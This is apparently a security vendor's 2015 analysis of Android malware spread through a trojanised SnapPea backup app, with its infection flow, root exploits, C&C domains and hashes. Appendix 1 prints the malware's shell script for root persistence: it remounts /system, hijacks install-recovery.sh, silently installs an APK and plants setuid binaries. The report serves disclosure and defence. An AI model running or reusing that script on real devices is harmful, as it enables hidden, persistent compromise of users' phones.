On June 4th 2015, Check Point discovered multiple instances of a sophisticated mobile malware campaign. The malware was previously inaccurately categorized as part of simple Adware campaign rather than the relatively advanced threat it actually is. Subsequent research by our mobile security specialists has found that the campaign consists of a set of malicious applications that are being automatically installed on Android devices after being physically connected to PCs that are infected with a version of the back-up application, SnapPea.
The attack, which was discovered by Check Point Mobile Threat Emulation, employs an extra-ordinarily large (12) number of exploits in order to gain root access to an Android device. This is the first time we have seen this many exploits being used in conjunction as part of one attack. It seems the developer has collected the exploits from several known exploit kits and employs them one after the other until one succeeds. Once an exploit runs successfully, the attacker can obtain root access which essentially gives them full control of the device.
This goes completely undetected by MDMs and enables the attacker to bypass any traditional security mechanisms. It’s worth noting that despite each exploit being part of a known Root-Kit, this unique form of implementation means that only an advanced sandboxing solution could have identified the threat.
What does the Malware do?
Once installed on an Android device, the malware attempts to contact its C&C servers and relay various forms of user and device data. It seems that the malware can collect data about the user, device parameters and cell network information.
The malware installs a differing number of applications without the user’s consent. The installed applications are currently used for Adware while clearly the activity can be changed to serve a much more malicious payload.
The malware has several evasion techniques ranging from the ability to hide its main code logic in system code folders to reinstalling itself after a removal attempt.
How can a Device be Infected?
This is a relatively complex Android attack that is infecting devices via a malicious version of a Windows backup application named SnapPea.
What is the infection flow?
- The infection flow beings with a user installing a of SnapPea on their PC
- If and when an Android device is connected to the machine, then SnapPea Android component is installed on the mobile device (with permission from the user).
- Once SnapPea is installed on the mobile device, repackaged versions of two apps (Daily Racing 1.3 and BatteryBot 8.3.5_zh10169) that contain malicious payloads are installed automatically (without user permission) and begin the process of installing malware on the device.
- Using the aforementioned set of 12 exploits, it obtains root rights on device, adds itself to boot and then starts listening for CnC server commands
It seems that the malware is only installed if the flow happens exactly as described above. If a user manually installs SnapPea from the Google Play Store, no malware is installed.
Detailed Analysis
Execution flow
Exploitation phase
- Decodes from string two ELF files and saves them to own folder with names “.service” and “.client”
- Decodes from string APK file and saves it to own folder with name “.dler.apk”
- Iteratively decrypts from string and tries to execute one of 12 exploits to obtain root
Post exploitation phase
- In case of successful privileges escalation, the application runs a shell script (Appendix 1), which performs the following actions:
a. Copies .service file to /system/xbin/.ext.base
b. Copies .client file to /system/xbin/.b.
c. Appends string to /system/etc/install-recovery.sh file, which will execute previously created file /system/xbin/.ext.base after factory reset. - Silently installs previously extracted file .dler.apk. which contains the downloader app. This application’s package name is com.android.hardware.ext0
- Start activity com.android.hardware.ext0.WakeActivity from the downloader app
Downloader application
- Installs a receiver of PACKAGE_ADDED intents. It will collect a list of all installed applications
- Starts a service which relays a list of installed applications to a remote server. The server sends back a list of commands. There are two types of command: Update and Uninstall.
a. Update commands contain URL, md5 hash and package name parameters. During an update, the downloader removes the application with given package name, then downloads a file from the given URL. If the md5 from the hash matches the md5 hash from the command, the downloader silently installs this file.
b. Download commands contain package name.
c. Downloader uninstalls application with given package name
d. Downloader starts - MobClickAgent with given SDK ID is activated.
Appendix 1. Installation shell script
am \”am start -n /com.android.hardware.ext0.WakeActivity –es channel_name “channel_name”
mount -o remount rw /system;
chmod -i -a /system/etc/install-recovery.sh;
echo -e ‘#!/system/bin/sh\n /system/xbin/.ext.base & \n ‘ > /system/etc/install-recovery.sh;
chmod 755 /system/etc/install-recovery.sh;
chattr +i +a /system/etc/install-recovery.sh;
chmod 777 /files/.dler.apk;
pm install -r /files/.dler.apk;
cat /files/.service(zipservicepath) > /system/xbin/.ext.base (server_path)
chown 0.0 /system/xbin/.ext.base
chmod 6777 /system/xbin/.ext.base
cat files/.client (zipclientpath) > /system/xbin/.b(client_path)
chown 0.0 /system/xbin/.b
chmod 6777 /system/xbin/.b
chmod 6777 /system/xbin/.b
CVEs
While the malware is utilizes 12 different exploits only 2 of them have official CVEs:
- VROOT – CVE-2013-6282
- Towelroot – CVE-2014-3153
List of C&C servers
oc.umeng.com
msg.zolmobi.com
pay.fastmopay.com
alog.umeng.com
app.adjust.io
app.adjust.io
base.fastmopay.com
d.techcdn.com
pay.fastmopay.com
api.aedxdrcb.com
Hashes (SHA 256)
- DAily RAcing 1c67bbce4af955b47d9b27037a6f063e06e08e500f1daaa3807043242a64eec0
- Battery Pro b066ed08c0a1e1dc074edb852678df2d48f7f5fcc88d80dbc787822fde84e455